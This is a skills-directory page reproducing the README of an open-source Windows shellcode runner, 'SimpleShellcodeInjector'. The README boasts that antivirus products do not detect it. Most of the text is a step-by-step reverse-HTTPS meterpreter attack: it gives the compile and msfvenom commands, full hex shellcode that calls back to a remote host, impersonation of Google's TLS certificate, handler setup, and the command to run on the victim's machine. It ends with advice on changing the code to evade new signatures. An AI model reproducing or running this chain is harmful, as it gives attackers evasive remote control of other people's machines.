SkillAgentSearch skills...

SimpleShellcodeInjector

SimpleShellcodeInjector receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application.

GenerateConvertImprove

Install / Use

/learn @DimopoulosElias/SimpleShellcodeInjector
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

SimpleShellcodeInjector (SSI)

N|Solid

Description

SimpleShellcodeInjector or SSI receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application and it stays under the radar for tools like Get-InjectedThread.
At the moment, many antivirus solutions will not detect it, even when you execute a meterpreter's shellcode, without obfuscation.
Let me note that, although you can use SSI in order to recieve a meterpreter, it is NOT a stager for metasploit. It just executes the shellcode you feed it.

Antivirus Detection (Rate: 0/30)

Actively Tested

At the moment, it has been actively tested against the following solutions (default settings - fully updated) and it returned a reverse meterpreter with success:

  • Windows Defender
  • Symantec Endpoint Protection
  • Kaspersky
  • ESET - Smart Security Premium (trial version)

Victim's OS: Windows 10 64 bit

AntiScan

url: https://antiscan.me/scan/new/result?id=2aZkjhzd1sHe

Detection rate (0/26)

Scan Date: 20-04-2019 20:00:38

d-Aware Antivirus: Clean

AhnLab V3 Internet Security: Clean

Alyac Internet Security: Clean

Avast: Clean

AVG: Clean

Avira: Clean

BitDefender: Clean

BullGuard: Clean

ClamAV: Clean

Comodo Antivirus: Clean

DrWeb: Clean

Emsisoft: Clean

Eset NOD32: Clean

Fortinet: Clean

F-Secure: Clean

IKARUS: Clean

Kaspersky: Clean

McAfee: Clean

Malwarebytes: Clean

Panda Antivirus: Clean

Sophos: Clean

Trend Micro Internet Security: Clean

Webroot SecureAnywhere: Clean

Windows 10 Defender: Clean

Zone Alarm: Clean

Zillya: Clean

Example Usage

A reverse https meterpreter example is being provided below. However, you can use any shellcode you like.

Important Note: Although some security solutions like Windows Defender do not detect the SSI as a virus, they can detect other factors which are not related to the SSI.For example they might detect metasploit's default certificate or the reverse tcp meterpreter.

Attacker's Machine: Generate payload for SSI:

$ i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
$ msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=443 -f c -o msf.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 545 bytes
Final size of c file: 2315 bytes
Saved as: msf.txt

$ cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368bb010000e8500100002f626a5468507451456358326a314b4c562d4b483955776e4d466970474165444b4e702d336e754f3776474a69785f58436b3957444442566a78544c7743536d736f68744d4476754a4a77746d4953624d774f77414a6a6f555564575f61476532764f314a534c364347424c6278535f7a6645447043494d50786443595f63326e735831775f4651316e33532d484f34644a376f68424c4832574173576d687762686533726c6866465177523557505465324366502d654f666a62414834597100506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c0751468881300006844f035e0ffd54f75cde8440000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe86bffffff312e322e332e3400bbf0b5a2566a0053ffd5

Prepare Metasploit - SSL impersonation:

$ msfconsole
msf exploit(multi/handler) > use auxiliary/gather/impersonate_ssl
msf auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
RHOST => www.google.com
sf auxiliary(gather/impersonate_ssl) > run

[*] www.google.com:443 - Connecting to www.google.com:443
[*] www.google.com:443 - Copying certificate from www.google.com:443
/C=US/ST=California/L=Mountain View/O=Google LLC/CN=www.google.com 
[*] www.google.com:443 - Beginning export of certificate files
[*] www.google.com:443 - Creating looted key/crt/pem files for www.google.com:443
[+] www.google.com:443 - key: /home/gweeperx/.msf4/loot/20180816131826_default_216.58.212.36_www.google.com_k_829605.key
[+] www.google.com:443 - crt: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_c_997519.crt
[+] www.google.com:443 - pem: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
[*] Auxiliary module execution completed

Prepare Metasploit - Handler:

msf auxiliary(gather/impersonate_ssl) > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set HandlerSSLCert /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
HandlerSSLCert => /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
msf exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:443

Victim's Machine:

C:\Users\gweeperx\Desktop>ssi.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368bb010000e81a0100002f303430705247463070385f53396450306959436451676264466553636e6c4346787333785a4e4a4a355072346d6430634b6f68366e64374d634973644b4239646249463958534c3435325f76456c74785472556452644b6e77447275547762767630794b5069796d544c726751395f2d326e7a626f30336530527255346848664961694a6f644f634a00506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c0751468881300006844f035e0ffd54f75cde84a0000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe86bffffff31302e31302e3131332e32303800bbf0b5a2566a0053ffd5
 +-+-+-+ +-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |S|S|I| |(|S|i|m|p|l|e| |S|h|e|l|l|c|o|d|e| |I|n|j|e|c|t|o|r|)|
 +-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |b|y| |g|w|e|e|p|e|r|x|
 +-+-+ +-+-+-+-+-+-+-+-+


Ready? Go!
  • Note: I am hiding the cmd window, so you will see not output from the SSI*

Enjoy your shell.

Notes

I tried to make it as simple as i could, in hope that it will be easy for anyone to make a few changes in the code and avoid AV signatures which will arise after the release of this tool.

DON'T forget to wear your white hat before you use it. ;-)

Related Skills

node-connect

337.7k

Diagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps

frontend-design

83.3k

Create distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.

openai-whisper-api

337.7k

Transcribe audio via OpenAI Audio Transcriptions API (Whisper).

commit-push-pr

83.3k

Commit, push, and open a PR

DimopoulosElias

View profile

View on GitHub
GitHub Stars258
CategoryDevelopment
Updated4mo ago
Forks75
DimopoulosElias/SimpleShellcodeInjector

Languages

C

Security Score

77/100

Audited on Nov 19, 2025

No findings